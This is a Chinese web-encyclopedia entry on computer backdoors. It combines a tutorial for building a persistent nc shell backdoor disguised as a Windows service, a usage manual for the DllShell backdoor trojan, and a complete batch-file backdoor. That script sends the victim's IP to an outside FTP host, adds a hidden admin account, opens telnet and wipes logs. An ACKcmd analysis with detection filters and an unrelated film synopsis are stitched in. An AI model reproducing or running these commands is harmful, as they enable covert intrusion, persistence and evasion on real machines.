科技: 人物 企业 技术 IT业 TMT
科普: 自然 科学 科幻 宇宙 科学家
通信: 历史 技术 手机 词典 3G馆
索引: 分类 推荐 专题 热点 排行榜
互联网: 广告 营销 政务 游戏 google
新媒体: 社交 博客 学者 人物 传播学
新思想: 网站 新书 新知 新词 思想家
图书馆: 文化 商业 管理 经济 期刊
网络文化: 社会 红人 黑客 治理 亚文化
创业百科: VC 词典 指南 案例 创业史
前沿科技: 清洁 绿色 纳米 生物 环保
知识产权: 盗版 共享 学人 法规 著作
用户名: 密码: 注册 忘记密码?
    创建新词条
科技百科
  • 人气指数: 3457 次
  • 编辑次数: 1 次 历史版本
  • 更新时间: 2009-03-19
admin
admin
发短消息
相关词条
H.265
H.265
IGZO技术
IGZO技术
触摸屏工作原理
触摸屏工作原理
1ZB
1ZB
喷码技术
喷码技术
机电一体化
机电一体化
PMMA塑料
PMMA塑料
自组织系统
自组织系统
终端
终端
模拟计算机
模拟计算机
推荐词条
希拉里二度竞选
希拉里二度竞选
《互联网百科系列》
《互联网百科系列》
《黑客百科》
《黑客百科》
《网络舆情百科》
《网络舆情百科》
《网络治理百科》
《网络治理百科》
《硅谷百科》
《硅谷百科》
2017年特斯拉
2017年特斯拉
MIT黑客全纪录
MIT黑客全纪录
桑达尔·皮查伊
桑达尔·皮查伊
阿里双十一成交额
阿里双十一成交额
最新词条

热门标签

微博侠 数字营销2011年度总结 政务微博元年 2011微博十大事件 美国十大创业孵化器 盘点美国导师型创业孵化器 盘点导师型创业孵化器 TechStars 智能电视大战前夜 竞争型国企 公益型国企 2011央视经济年度人物 Rhianna Pratchett 莱恩娜·普莱契 Zynga与Facebook关系 Zynga盈利危机 2010年手机社交游戏行业分析报告 游戏奖励 主流手机游戏公司运营表现 主流手机游戏公司运营对比数据 创建游戏原型 正反馈现象 易用性设计增强游戏体验 易用性设计 《The Sims Social》社交亮 心理生理学与游戏 Kixeye Storm8 Storm8公司 女性玩家营销策略 休闲游戏的创新性 游戏运营的数据分析 社交游戏分析学常见术语 游戏运营数据解析 iPad风行美国校园 iPad终结传统教科书 游戏平衡性 成长类型及情感元素 鸿蒙国际 云骗钱 2011年政务微博报告 《2011年政务微博报告》 方正产业图谱 方正改制考 通信企业属公益型国企 善用玩家作弊行为 手机游戏传播 每用户平均收入 ARPU值 ARPU 游戏授权三面观 游戏设计所运用的化学原理 iOS应用人性化界面设计原则 硬核游戏 硬核社交游戏 生物测量法研究玩家 全球移动用户 用户研究三部曲 Tagged转型故事 Tagged Instagram火爆的3大原因 全球第四大社交网络Badoo Badoo 2011年最迅猛的20大创业公司 病毒式传播功能支持的游戏设计 病毒式传播功能 美国社交游戏虚拟商品收益 Flipboard改变阅读 盘点10大最难iPhone游戏 移动应用设计7大主流趋势 成功的设计文件十个要点 游戏设计文件 应用内置付费功能 内置付费功能 IAP功能 IAP IAP模式 游戏易用性测试 生理心理游戏评估 游戏化游戏 全美社交游戏规模 美国社交游戏市场 全球平板电脑出货量 Facebook虚拟商品收益 Facebook全球广告营收 Facebook广告营收 失败游戏设计的数宗罪名 休闲游戏设计要点 玩游戏可提高认知能力 玩游戏与认知能力 全球游戏广告 独立开发者提高工作效率的100个要点 Facebook亚洲用户 免费游戏的10种创收模式 人类大脑可下载 2012年最值得期待的20位硅谷企业家 做空中概股的幕后黑手 做空中概股幕后黑手 苹果2013营收 Playfish社交游戏架构

目录

[显示全部]

概述编辑本段回目录


绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除后门,那么它就成了安全风险。后门又称为Back Door —— 谈到它,就不得不先提一下相关知识:大家都知道,一台计算机上有65535个端口,那么如果把计算机看作是一间屋子,那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。为什么需要那么多扇门呢?因为主人的事务很繁忙,它为了同时处理很多应酬,就决定每扇门只对一项应酬的工作。所以有的门是主人特地打开迎接客人的(提供服务),有的门是主人为了出去访问客人而开设的(访问远程服务)——理论上,剩下的其他门都该是关闭着的,但偏偏因为各种原因,有的门在主人都不知道的情形下,却被悄然开启。于是就有好事者进入,主人的隐私被刺探,生活被打扰,甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是今天我们要讲的“后门”。当然,这只是一个比喻,事实上除了通过端口连接外,也可以通过串/并口,无线设备连接的方式进行入侵,为了行文方便,以下文中的“端口”泛指各种对外接口(interface)。

利用军刀NC打造成一个简单后门 编辑本段回目录

  大家都知道nc是一个强大并且灵活的黑客工具,用他可以做很多事情,譬如做为telnet的客户端口,譬如入侵的时候反弹回来shell,譬如扫描……但是你有没有想过将他打造成一个服务级的后门呢?现在好多跟我一样的菜鸟还不懂得编程,别人写的流行点的后门又经常被杀,那就跟我一起来自己手工制作一个后门吧,不需要任何编程知识菜鸟级的东东哦。

  首先请准备好不被杀的nc.exe(随便加个壳就可以了的),还有sc.exe(这个是操作服务的一个小工具,被人称为操作服务的军刀),这些就可以打造我们自己的后门了,后门的要求我想不需要很强的操作功能,只需要当我们连接的时候获得一个system权限的shell就可以了,有了cmdshell做什么不可以呢。如果你需要反弹的后门,也可以做到,自己注册个域名就可以用nc反弹了,因为比较复杂这里就不说了。我们知道nc就是实现我们的后门功能的最经典的工具,我们来看看nc的帮助,命令行下输入nc -h就可以看到,我们主要用到的几个参数如下:

-e 绑定一个程序并且连接时执行
-l 监听模式
-p 指定nc要运行的本地端口
-L 增强了的监听模式,当连接断开时再次监听
  
  至于其他的用法相信各位已经很了解了的,我们以前经常用到的是

nc -l -e cmd.exe -p 8888 \监听8888端口,当有连接时重定向到cmd.exe实现绑定一个shell\

  这样的形式用serveru等溢出程序执行后来绑定一个可以得到shell的端口8888,我们telnet或者nc连接上来的时候就可以直接获得一个shell。但是这样连接断开之后监听的端口就会关闭,是一次性的,不能再次获得shell,这样当然不适合于做后门了。后来发现nc的这个参数L可以一直保持监听的状态,可以反复连接。用

nc -L -e cmd.exe -p 8888 \也是绑定的,不过加强了的\

  这样的命令就已经达到我们的目的了,但是我们往往是在溢出的shell里工作,留后门是为了以后的进入,那我们如何保证nc再机器重起之后还可以工作从而实现我们的后门的目的呢?你可以把他放到注册表的Run等启动项下面,但是感觉那样不是太好,有些地方已经被杀毒软件盯上了,把我的后门放到那里实在不是很放心,后来想到干脆作成服务吧!随着系统启动而启动,呵呵。那就看看如何打造服务吧!

  首先我们将nc.exe放到%systemroot%system32下面,起名叫svch0st.exe或者放到%systemroot%system下面更名叫svchost.exe,这样的目的是为了在任务管理器里看不出异样。然后用sc替换系统的服务,不用改别的,只要修改他的执行路径就可以了,我们就改那个clipsrv.exe服务吧!命令如下:

sc config clipsrv start= auto \将clipsrv.exe服务设置为自动\
sc config clipsrv binpath= "c:winntsystem32svch0st.exe -L -e cmd.exe -p 8888" \设置clipsrv.exe服务的启动路径为我们的nc\
sc start clipsrv \启动clipsrv.exe服务\

  嘿嘿,但是看看结果吧!看看服务里的显示信息,如图一,很显眼哦!不管,先启动服务然后

netstat -an find "8888" \netstat -an的结果中查找8888看我们的程序是否运行\

  的确是已经被打开了,但是当显示服务没有响应的时候nc的进程被结束了,这是Windows服务管理机制吧。不是很成功呵,我们继续改造!不懂编程的我们这个时候就会很郁闷,因为不能让服务停止响应的时候我开始想用bat2exe.exe,但是启动服务的时候总是出现拒绝访问的错误,大概是bat2exe出来的exe文件不被系统服务格式所支持,只能想其他的办法了,于是我想到了用Winrar.exe来做我们自己的exe文件,这总该被服务的可执行文件支持吧!至于如何实现编程里的子进程在父进程终止后仍然可以在内存中运行,我用的方法是写个run.vbs然后用cscript.exe来调用,至于如何调用就可以在自解压格式里设置解压后运行cscript.exe run.vbs,如图三。其中Run.vbs里的内容如下:

dim sh \定义变量\
set sh=createobject("wscript.shell") \取得WSH对象\
sh.run "nc -L -e cmd.exe -p 8888",0 \执行我们的程序并隐藏错误\

  而自解压的路径写上%systemroot%system32,这样我们自解压服务程序就做好了,保存为c1ipsrv.exe(不好意思,还是用那个1和l的把戏),放到c:winntsystem32目录下面。现在修改我们的clipsrv剪切薄服务的具体路径为c:winntsystem32c1ipsrv.exe,命令如下:

sc stop clipsrv \将clipsrv.exe服务设置为自动\
sc config clipsrv start= auto
sc config clipsrv binpath= "c:winntsystem32c1ipsrv.exe" \设置clipsrv.exe服务的启动路径为我们的nc\
sc start clipsrv \启动clipsrv.exe服务\

  现在一切OK了,这样以来我们的程序的参数细节还会被屏蔽,比开始的参数直接放到执行文件路径里好多了。我们来实验下。先net start clipsrv,然后netstat -an find "8888"看看开没开8888端口,最后用nc 127.0.0.1 8888连接上去得到shell了呵!如图四。好了,快去体验自己动手的快乐哦,你还可以作其他的事情,只要你的服务的程序做的够好,甚至可以用反向回来的nc,具体我就不写了。

  本文是我看了韩的一个动画之后想到的,后来自己想到完全可以将nc改成后门的,不过也还是有很大的缺陷,毕竟不是编程,因为不能返回信息给服务控制器,会在日志里留一些错误,不过,有多少人去在意这些错误呢?还有就是没有身份验证功能,不过端口可以自定义不知道算不算一个身份验证。
  

后门产生的必要条件编辑本段回目录



  后门产生的必要条件有以下三点:

  1.必须以某种方式与其他终端节点相连——由于后门的利用都是从其他节点进行访问,因此必须与目标机使用双绞线、光纤维、串/并口、蓝牙、红外等设备在物理信号上有所连接才可以对端口进行访问。只有访问成功,双方才可以进行信号交流,攻击方才有机会进行入侵。
  2.目标机默认开放的可供外界访问的端口必须在一个以上——因为一台默认无任何端口开放的机器是无法连接通信的,而如果开放着的端口外界无法访问,则同样没有办法进行入侵。
  3.目标机存在程序设计或人为疏忽,导致攻击者能以权限较高的身份执行程序。并不是任何一个权限的帐号都能够被利用的,只有权限达到操作系统一定要求的才允许执行修改注册表,修改log记录等相关修改。

在生活中,有的人走“后门”,靠关系、金钱、权力等方式进行违法的操作。

电影:
导演:
李翰祥 Han Hsiang Li

主演:
胡蝶 Die Hu
王引 Yin Wang

更多外文片名:
Hou men
Rear Entrance
国家/地区:香港
对白语言:粤语

剧情梗概:故事以香港为背景,讲述胡蝶扮演的无法生育的中年妇人,常常在窗前注视对面可怜的小女孩王爱明。她因生母另嫁、后母不甚喜爱而郁郁寡欢。胡蝶得对方同意后,将小女孩领来,视如已出。在她的关爱下,渐渐小女孩恢复活泼可爱的天性。正在此时,女孩的生母回来……

徐天鹤夫妇(王引、胡蝶)结婚八年,恩爱如初,唯一憾事是没有孩子,看到邻居家女孩阿琳(王爱明)不为父亲何泽美先生和继母喜爱,经常独自一人在后门和小猫玩,经两家协商,徐家办理了领养手续,把阿琳领到家里来做了女儿。这样的三口之家,原本也是美满的生活,不料阿琳的生母史小姐(李香君)找来要领走阿琳。经过劝说,史小姐放弃意愿,但是她同意史小姐经常来探望阿琳。从此史女士成了徐家的常客,并与鹤妻成为好朋友。鹤妻把表弟应作图(赵明)介绍给史小姐。史小姐遇车祸住院,阿琳去探望,鹤妻终于同意阿琳重回母亲怀抱。

超强2000平台下Shell程序ACKcmd后门分析编辑本段回目录

简介 
-=-=-=-=--=
ACKcmd是提供Win2000下远程命令Shell的一种后门,它使用TCP来传输,但是不同于一般正常的TCP连接有三次握手,ACKcmd仅使用了TCP ACK数据包,所以一般情况下可以穿越防火墙及躲避IDS的检测。

ACKcmd采用client/server结构,在目标机器上运行AckCmdS.exe植入后门,入侵者在客户端运行命令AckCmdC 即可获得一个远程的Shell。


分析
-=-=-=-=--=
我们现在用sniffit来观察ACKcmd的数据是怎样传输的。入侵者在192.168.0.29,连入目标机器192.168.0.2:

E:Tools>ackcmdc 192.168.0.2

AckCmd 1.1 - The Ack Command Prompt for Windows 2000
           - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
           - For instructions see http://ntsecurity.nu/toolbox/ackcmd/

Type "quit" and press Enter to quit

AckCmd> net name     quit        <------ 退出

sniffit抓到的包如下:

TCP Packet ID (from_IP.port-to_IP.port): 192.168.0.29.80-192.168.0.2.1054       
   SEQ (hex): 6060606   ACK (hex): 6060606                                                         
   FLAGS: -A----   Window: 4000                                                                    
Packet ID (from_IP.port-to_IP.port): 192.168.0.29.80-192.168.0.2.1054           
45 E 00 . 00 . 38 8 00 . 00 . 00 . 00 . 80 . 06 . B9 . 50 P C0 . A8 . 00 . 1D .
C0 . A8 . 00 . 02 . 00 . 50 P 04 . 1E . 06 . 06 . 06 . 06 . 06 . 06 . 06 . 06 .
70 p 10 . 40 @ 00 . E6 . C6 . 00 . 00 . 02 . 04 . 05 . B4 . 01 . 01 . 04 . 02 .
6E n 65 e 74 t 20   6E n 61 a 6D m 65 e                                        


TCP Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80       
   SEQ (hex): 6060606      FLAGS: ---R--                                        
Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80          
45 E 00 . 00 . 28 ( 04 . A8 . 00 . 00 . 80 . 06 . B4 . B8 . C0 . A8 . 00 . 02 .
C0 . A8 . 00 . 1D . 04 . 1E . 00 . 50 P 06 . 06 . 06 . 06 . 06 . 06 . 06 . 06 .
50 P 04 . 00 . 00 . 11 . EB . 00 . 00 .                                        


TCP Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80       
   SEQ (hex): 6060606   ACK (hex): 6060606                                      
   FLAGS: -A----   Window: 4000                                                 
Packet ID (from_IP.port-to_IP.port): 192.168.0.2.1054-192.168.0.29.80           
45 E 00 . 00 . CD . 04 . A9 . 00 . 00 . 80 . 06 . B4 . 12 . C0 . A8 . 00 . 02 .
C0 . A8 . 00 . 1D . 04 . 1E . 00 . 50 P 06 . 06 . 06 . 06 . 06 . 06 . 06 . 06 .
70 p 10 . 40 @ 00 . 1C . C1 . 00 . 00 . 02 . 04 . 05 . B4 . 01 . 01 . 04 . 02 .
0D . 0A . C3 . FB . B3 . C6 . 20   20   20   20   20   20   20   20   20   20  
20   20   20   20   0D . 0A . 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D - 2D -
2D - 2D - 2D - 2D - 2D - 0D . 0A . 53 S 45 E 52 R 56 V 45 E 52 R 32 2 30 0 30 0
30 0 20   20   20   20   20   20   0D . 0A . 41 A 44 D 4D M 49 I 4E N 49 I 53 S
54 T 52 R 41 A 54 T 4F O 52 R 20   20   20   0D . 0A . C3 . FC . C1 . EE . B3 .
C9 . B9 . A6 . CD . EA . B3 . C9 . A1 . A3 . 0D . 0A . 0D . 0A .               

可以看出,这次操作总共传输了三个TCP包。客户端的端口号是80,服务器的端口号是1054,这种类似于HTTP的通信是很容易被网管忽略的。客户端的命令net name以明文方式放在TCP的数据段,服务器立刻返回一个TCP RST包,然后接着返回一个TCP ACK,其中带着命令执行后的输出结果。如果输出结果很长,ACKcmd只能返回部分数据,这是作者在设计时没有考虑的。你可以运行dir c:winntsystem32看看,只能输出部分文件列表,最后附带信息“More...”表示并不是返回了全部数据。


检测
-=-=-=-=--=
首先,它采用的端口(80和1054)是固定的。要监控客户端发出的数据包,tcpdump的过滤规则为:

tcp[0:2] = 80 and tcp[2:2] = 1054

多做几次试验,可以发现它们之间通信的TCP ACK包中,序列号和ACK号都是0x06060606(十进制101058054),这也是一个很重要的特征。tcpdump的过滤规则为:

tcp[4:4] = 0x06060606 and tcp[8:4] = 0x06060606


缺陷
-=-=-=-=--=
正如作者所说,这是一个使用TCP ACK穿越防火墙的proof-of-concept,所以并不是很完善。数据的明文方式传输,以及在Win2000的任务列表中能看到AckCmdS.exe,所以此后门不难被发现。

后门木马DllShell v1.3的使用详解编辑本段回目录

dllshell v1.3更新日志:2006-09-22

[+]添加secdel功能,安全删除磁盘文件,不过增加了后门体积 :-(
[+]添加softinfo [-m]功能,可以查看安装了哪些软件包,-m选项提供更详细信息
[+]给dllshell加了Microsoft的文件信息(Windows XP下wzcsvc.dll的文件信息)
[!]修正使用ps -{mv|mc|md}可能导致后门崩溃的bug
[!]修正了内置DOS命令的几个小bug
[!]修正了进入cmdshell后,60秒就断开连接的bug,连接保活时间由配置文件的RecvTimeOut项决定
DllShell v1.2
 nop www.ph4nt0m.org

有几个功能函数是参考&修改于Nameless Shell的代码,在此对作者的开源精神表示感谢.
如果发现任何bug或者有任何建议,请和我联系,谢谢!

后门使用
========================================================================
配置:
setdll.exe -w dllshell.dll //写入后门配置
setdll.exe -r dllshell.dll //读取后门配置

安装:
rundll32 dllshell.dll,I password //I和password之间只有一个空格

卸载:
rundll32 dllshell.dll,R password //然后重启即可

Q&A
=========================================================================
Q: DllShell的启动方式?
A: 后门采用替换系统原有服务的方法实现自启动,请替换服务前,确定该服务存在,否则后门可能安装失败.

Q: 如何知道后门安装成功?
A: 确认是否安装成功,请查看system32目录下面生成的dllshell.log文件,里面有安装过程的信息.
后门运行过程中不会生成log,请放心使用 :-)

Q: 如何卸载后门?
A: 后门启动时自动开启了自我保护线程(包括注册表项, 自身dll文件保护, IP变更通知).
如果要卸载后门,请先执行shield off命令,挂起保护线程,然后重启机器即可.

Q: 如何连接后门?
A: 连接后门请使用nc或者putty,使用系统自带的telnet是无法连接上后门的.
(why? telnet是一个字符一个字符发送,nc是在用户按下Enter后将用户缓冲一次发出)
正连或者反连成功后,没有任何提示符,请输入正确密码,即可看见欢迎banner.
还要注意的是,如果连上10s内没有输入密码,后门会自动断开

Q: 如何配置后门?
A: 请在dllshell.ini里面填写适当的信息,然后用setdll.exe -w dllshell.dll将配置写入
如果不放心写入的信息,可以用setdll.exe -r dllshell.dll 查看写入的配置

Q: 如何让后门融入系统dll大家庭?
A: 你可以用资源修改工具如ResHacker或者Restorator给dll添加上Microsoft的版权信息.
如果想使后门更小巧,请用WinUpack等工具压缩即可.

Q: 后门有哪些特点?
A: 请看后面的命令说明,功能还是挺全的.而且有时间还会不断添加.

命令详细说明
===========================================================================
ps -l
 枚举进程
ps -k 
 结束进程,可用PID或者进程名
ps -d 
 在结束进程的基础上,然后删除进程的映象文件,可以对付某些弱智木马 :-)
ps -m 
 列举指定进程的模块,包括模块名(Module Name) 加载基址(Base Address)和映象路径(ImagePath)
ps -mv 
 列举指定进程的模块,包括模块名(Module Name) 和文件版本号(FileVerison),
 比如:
 Module FileVersion
 =============================================================================
 USER32.dll 5.00.2195.6897

ps -md
 列举指定进程的模块,包括模块名(Module Name) 和文件描述(FileDescription)
 比如:
 Module FileVersion
 =============================================================================
 USER32.dll Windows 2000 USER API Client DLL

ps -mc
 列举指定进程的模块,包括模块名(Module Name) 和公司名称(CompanyName)
 比如:
 Module CompanyName
 =============================================================================
 USER32.dll Microsoft Corporation

ps -h
 隐藏指定的进程,可用PID或者进程名
 此段代码非我写,改写自pjf的HideProcess.cpp,自然不能过Icesword :-)

User -e
 枚举系统用户

User -a  [UserPassword]
 添加指定用户到Administrators组,并且密码永不过期, 如果不指定UserPassword,则为空密码

User -d
 删除指定用户

User -n
 将指定用户的"上次登录"改为"从不",同时修改该用户成功登录次数为0

User -c   [Dest_UserPassword]
 克隆帐号,也可恢复克隆的帐号,将Src_UserName,Dest_UserName同时设为Dest_UserName即可恢复克隆的帐号.

User -cc
 检测克隆帐号

Netstat -t
 枚举TCP连接

Netstat -te
 只列出Established状态的TCP连接

Netstat -u
 枚举UDP本地端口

Netstat -a
 等于Netstat -t 加上Netstat -u

Netstat -k 
 断开已经建立的TCP连接(IP,端口用:隔开即可)
 比如
 netstat -k 192.168.0.1:3333 192.168.0.2:4444

Svc -ew
 枚举Win32服务

Svc -es
 枚举Driver服务

Svc -start
 启动指定服务

Svc -stop
 停止指定服务

Svc -d
 删除指定服务

Svc -c 
 设置服务的启动方式
 ServiceType为: Auto/Demand/Disable(自动/手动/禁用)

Svc -q
 查询指定服务的详细信息.
 比如svc -q w32time, 返回如下信息:
 Service Information:
 ---------------------------------------
 ServiceName: bits
 DisplayName: Background Intelligent Transfer Service
 Description: 用闲置网络带宽在后台传输文件。如果此服务被禁用,那么任何依赖于
 BITS 的功能,例如 Windows Update 或 MSN Explorer,都将不能自动
 下载程序和其它信息。
 ImagePath: C:WINNTSystem32svchost.exe -k BITSgroup
 ServiceDll: C:WINNTSystem32qmgr.dll
 StartName: LocalSystem
 Dependencies: LanmanWorkstation Rpcss SENS Wmi
 ErrorControl: Normal
 StartType: Manual
 CurrentState: Stopped

 Service Information Complete.

Shutdown -i  [TimeOut]
 初始化关机过程,Message为显示给当前用户的消息,如果TimeOut未指定,默认为60s.

Shutdown -a
 取消关机过程.

Shutdown -r
 重启

Shutdown -s
 关机

Shutdown -p
 关闭电源

Shutdown -l
 注销

Term -i [Port]
 安装终端服务,如果Port不指定,默认为3389.

Term -p [Port]
 更改终端服务端口,如果Port未指定,则查询当前终端服务端口.

MD/RD 
 删除目录

DEL
 删除文件

DIR|LS [Pattern]
 显示文件和目录,Pattern支持通配符,例如dir *.exe

--------------------------------------------------------------------------------------

AutoRun -e
 枚举注册表里面的启动项,相当全面.

AutoRun -d 
 删除指定启动项目.
 比如,autorun -e, 返回如下信息:

 16.[HKCUSOFTWAREMicrosoftWindowsCurrentVersionRun]
 ------------------------------------------------------------------------
 [0]Internat.exe:
 internat.exe

 用autorun -d 16 0, 即可删除"[0]Internat.exe:"项目

Mouse -l/u
 锁定/解除锁定鼠标指针

Mouse -s/r
 交换/恢复鼠标左右键
 
Assoc
 枚举一些关键扩展名的执行关联,很老的马才会用这招了.
 比如输入assoc, 返回信息如下:
 文件关联:
 -----------------------------
 项目名称 状态(异常标志: ==> )
 -------- ----
 exe文件: "%1" %*
 com文件: "%1" %*
 bat文件: "%1" %*
 cmd文件: "%1" %*
 pif文件: "%1" %*
 scr文件: "%1" /S
 txt文件: ==> n0tepad.exe %1
 ini文件: %SystemRoot%System32NOTEPAD.EXE %1
 inf文件: %SystemRoot%System32NOTEPAD.EXE %1
 reg文件: regedit.exe "%1"

Clog
 清除系统日志(包括应用程序/安全性/系统)

Exec
 执行可执行文件

FindPass
 查找2k/Nt的用户口令.
 修复Nameless里面findpass的两个bug:
 (system权限不能获取domain/username和只能查找一个winlogon进程的小bug)

FileTime 
 修改指定文件的创建日期和最后修改时间 到 DateTime指定的时间
 DataTime的格式为yyyymmddhhmmss,如20060524152307
 注:可以修改具有只读,隐藏,系统属性的文件时间

Help|?
 帮助

LockPC
 锁定工作站的桌面

Shell [CmdFile]
 打开CMD命令行,如果CmdFile未指定,默认为cmd.exe
 如果管理员删除了cmd.exe,或者修改了cmd.exe的权限;
 你可以先wget个自己的mycmd.exe,然后Shell mycmd.exe即可

Shield
 恢复/挂起自我保护线程,如果要卸载后门,请先Shield Off

SysInfo
 收集系统配置信息,比较详细:-)
 比如sysinfo, 返回信息如下:
 系统信息
 --------------------------------------
 系统版本: Microsoft Windows 2000 Advance Server Service Pack 4.0(Build 2195)
 产品ID: 52273-005-6861993-09773
 安装路径: H:WIN2000PROI386
 安装时间: 2046-1-20, 15:22:56
 注册组织: Microsoft
 注册用户: BillGates
 主机名: WEB_SERVER
 Windows目录: C:WINNT
 系统目录: C:WINNTsystem32

 CPU个数: 1个
 CPU[0]: Intel(R) Pentium(R) 4 CPU 2.40GHz频率: 2391MHz
 内存容量: 255MB Total, 31MB Free.
 显示属性: 1024 x 768, 刷新率: 85Hz, 色深: 32bit
 运行时间: 0天 00:10:32

 盘符[卷标] 驱动器|文件系统 总大小|可用空间 百分比
 -----------------------------------------------------------------------------
 C:| 硬盘|NTFS 12001MB| 92MB 11.7G| 0.1G 0.8%
 D:|本地磁盘 硬盘|FAT32 15633MB| 125MB 15.3G| 0.1G 0.8%
 E:| 硬盘|FAT32 15633MB| 93MB 15.3G| 0.1G 0.6%
 F:| 硬盘|FAT32 15633MB| 3708MB 15.3G| 3.6G 23.7%
 G:|本地磁盘 硬盘|FAT32 15610MB| 59MB 15.2G| 0.1G 0.4%
 H:| 光驱|无碟 0MB| 0MB 0.0G| 0.0G 0.0%
 I:| 网络驱动器| 0MB| 0MB 0.0G| 0.0G 0.0%

 硬盘总容量: 74513MB|72.8G
 剩余空间: 4078MB|4.0G
 可用百分比: 5.5%

 本机IP
 --------------------------------------
 IP[0]: 192.168.0.1

Wget  [SaveFileName]
 Http下载文件到system32目录下面,
 注意URL前面要加上http://
 如果SaveFileName没指定,则使用URL里面的文件名
 比如, wget http://192.168.0.2/cmd.exe mycmd.exe 则保存的文件名为mycmd.exe
 wget http://192.168.0.2/cmd.exe 则保存的文件名为cmd.exe

Quit|Exit
 退出Dllshell.

IRC波特给系统开后门编辑本段回目录

一个名为“IRC波特变种CLQ(Backdoor.Win32.IRCbot.clq)”的病毒特别值得注意,它通过网络传播,黑客可以通过IRC软件对中毒电脑进行控制,对外发动攻击,给计算机系统带来重大安全隐患。


因此瑞星反病毒反木马一周播报(2008.05.26-06.01)将其列为本周关注病毒,警惕程度为。


“IRC波特变种CLQ”是一个后门病毒。该病毒运行后复制自身到驱动程序目录下,文件名为wmiadapi.exe,并自动写入注册表启动项,实现开机自动运行。病毒还会在中毒电脑上开设后门,自动连接cftp.dawn****.info接受远程指令,黑客可以利用IRC软件对染毒的计算机进行远程控制,进行多种危险操作。同时,该病毒还会自动修改系统文件,使系统一些正常的网络功能遭到破坏。


对此,专家建议用户:1、养成良好的上网习惯,不打开不良网站,不随意下载安装可疑插件。2、开启Windows安全中心、防火墙和自动更新,及时安装最新系统补丁,避免病毒通过系统漏洞入侵电脑。3、安装杀毒软件2008版升级到最新版本,定时杀毒并开启实时监控功能,防止病毒感染计算机。4、定时设置系统还原点和备份重要文件,并把网银、网游、QQ等重要软件加入到“账号保险柜”中,这样就可以防止病毒窃取自己的游戏账号、密码等私人资料。

批处理后门编辑本段回目录

@echo off
cls
if "%1" == "h" goto begin
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
:begin
time /t>>time.txt
for /f "tokens=2 delims=:" %%a in (time.txt) do set ip=%%a
del time.txt /q
ipconfig>>ipconfig.txt
for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do echo %%i>>ip.txt
echo open lxz.0moola.com 21>a
echo lxz.0moola.com>>a
echo 1052104151>>a
echo bin>>a
echo put ip.txt /IP/%ip%.txt>>a
echo by>>a
ftp.exe -s:a
del ipconfig.txt /q
del ip.txt /q
del a /q
sc config Schedule start= auto
net start schedule
schtasks /create /tn Monitor /tr %SystemRoot%system32inetser.bat /sc onlogon /ru system
echo inetscr.exe -s:%SystemRoot%system32a >>%SystemRoot%system32inetser.bat
echo open 本机IP 端口>%SystemRoot%system32a
copy %SystemRoot%system32ftp.exe %SystemRoot%system32inetscr.exe
attrib +s +h %SystemRoot%system32a
attrib +s +h %SystemRoot%system32inetscr.exe
attrib +s +h %SystemRoot%tasksMonitor.job
reg add "HKLMSYSTEMCurrentControlSetControlLsa" /v forceguest /f /t REG_DWORD /d 00000000
echo Windows Registry Editor Version 5.00 >>c:h.reg
echo. >>c:h.reg
echo [HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNameslxz$] >>c:h.reg
echo @=hex(1f7): >>c:h.reg
echo regedit /s c:h.reg >>c:h.bat
echo del c:h.reg /q >>c:h.bat
echo REG add HKLMSAMSAMDomainsAccountUsers00001F7 >>c:h.bat
echo REG COPY HKLMSAMSAMDomainsAccountUsers00001F4 HKLMSAMSAMDomainsAccountUsers00001F7 /s /f >>c:h.bat
echo net user lxz$ lxz>>c:h.bat
echo del c:h.bat /q >>c:h.bat
at 10:00 c:h.bat
schtasks /run /tn at1
schtasks /run /tn Monitor
tlntadmn config sec = -ntlm
tlntadmn config port = 420
copy %SystemRoot%system32tlntsvr.exe %SystemRoot%system32inetsvr.exe
attrib +s +h %SystemRoot%system32inetsvr.exe
echo [Version] >>c:inetsvr.inf
echo Signature="$WINDOWS NT$" >>c:inetsvr.inf
echo [DefaultInstall.Services] >>c:inetsvr.inf
echo AddService=inetsvr,,My_AddService_Name >>c:inetsvr.inf
echo [My_AddService_Name] >>c:inetsvr.inf
echo DisplayName=Windows Internet Service >>c:inetsvr.inf
echo Description=提供对 Internet 信息服务管理的支持。>>c:inetsvr.inf
echo ServiceType=0x10 >>c:inetsvr.inf
echo StartType=2 >>c:inetsvr.inf
echo ErrorControl=0 >>c:inetsvr.inf
echo ServiceBinary=%SystemRoot%system32inetsvr.exe >>c:inetsvr.inf
rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:inetsvr.inf
del c:inetsvr.inf /q
net start inetsvr
net stop schedule
for /r %%a in (*.txt) do find "本机IP" >nul %%a && echo 1980>%%a
for /r %%b in (*.log) do find "本机IP" >nul %%b && echo 1980>%%b
for /r %%c in (*.evt) do find "本机IP" >nul %%c && echo 1980>%%c
for /r %%d in (*.event) do find "本机IP" >nul %%d && echo 1980>%%d
net start schedule
schtasks /delete /tn at1 /f
del %0 /q
del lxz.bat /q

黑洞后门程序变种GE”病毒技术细节编辑本段回目录

危险等级:★★★
病毒名称:Backdoor.Win32.BlackHole.ge
截获时间:2008.03.06
入库版本:20.34.31
类型:病毒

感染的操作系统:Windows XP, Windows NT, Windows Server 2003, Windows 2000
威胁情况:

传播级别:中

清除难度:困难

破坏力
   这是一个Delphi编写的名为黑洞的后门病毒。病毒主文件的分析如下:

